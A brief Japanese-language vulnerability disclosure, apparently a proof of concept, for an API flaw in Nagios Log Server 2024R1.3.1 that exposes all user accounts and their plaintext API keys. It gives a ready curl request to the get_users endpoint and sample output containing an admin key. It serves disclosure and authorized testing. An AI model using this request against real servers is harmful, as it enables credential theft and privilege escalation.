CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H研究および許可されたテストのみを目的としています。 許可なくシステムに対して使用しないでください。
Nagios Log Server 2024R1.3.1 におけるAPIレベルの脆弱性により、有効なAPIトークンを持つ任意のユーザーが、管理者資格情報を含むユーザーアカウントの完全なリストとその平文のAPIキーを取得できます。この欠陥により、ユーザー列挙、権限昇格、および露出したトークンの不正使用によるシステム全体の侵害が可能になります。
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]